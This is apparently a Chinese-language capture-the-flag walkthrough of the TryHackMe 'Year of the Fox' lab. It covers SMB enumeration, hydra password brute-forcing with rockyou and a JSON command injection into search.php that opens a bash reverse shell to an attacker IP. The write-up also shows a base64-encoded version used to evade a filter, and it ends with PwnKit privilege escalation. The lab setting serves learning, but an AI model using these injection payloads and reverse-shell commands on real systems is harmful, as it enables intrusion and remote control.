扫描打点

80提示要登录

没信息啊,先转到
smb看看有没有共享什么的smb1
enum4linux -a 10.10.156.98
这里用本地连
vpn跑不出来,换成attackbox才行,令人感慨有一个无法访问到的共享:

和两个账户:

没东西了,考虑拿这两个用户名去爆破登录框
web1
2hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.156.98 http-get
hydra -l fox -P /usr/share/wordlists/rockyou.txt 10.10.156.98 http-get
拿到账密:
rascal:june14
json注入拿rce登陆进去是个搜索框,抓包看到是给
search.php上传了一个json数据格式
这里用到的是没学过的
json注入,但注入的思想类似,这里使用"\来分隔数据并达到命令执行的效果
这个大致思路是这样的:
\"转义双引号,用于闭合命令执行里面这个参数前面的双引号;结束当前命令\n写入当前命令后换行,保证写入的命令的执行可以写反弹
shell了:1
{"target":"\"; /bin/bash -i >& /dev/tcp/10.10.223.151/443 0>&1 \n"}

然后被逮捕了,应该是符号的问题,懒得测了直接转
base641
{"target":"\"; echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjIyMy4xNTEvNDQzIDA+JjE= |base64 -d |bash\n"}

横向移动懒狗一把梭看了下
/home有两个跟上面一样的用户,但不能用su来转到rascal懒狗了,传个
linpeas一把梭看看我草我发现个巨懒狗的非预期解,网上目前没人发tmd一年后的通杀确实能梭
这里扫出来这个,直接跟
jellyfish一样传个PwnKit就一步root了
这里版本号是
18,低版本确实直接梭
THM打靶日寄21-Year of the Fox
- 本文链接: http://noone40404.github.io/2024/11/17/THM打靶日寄21:Year of the Fox/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!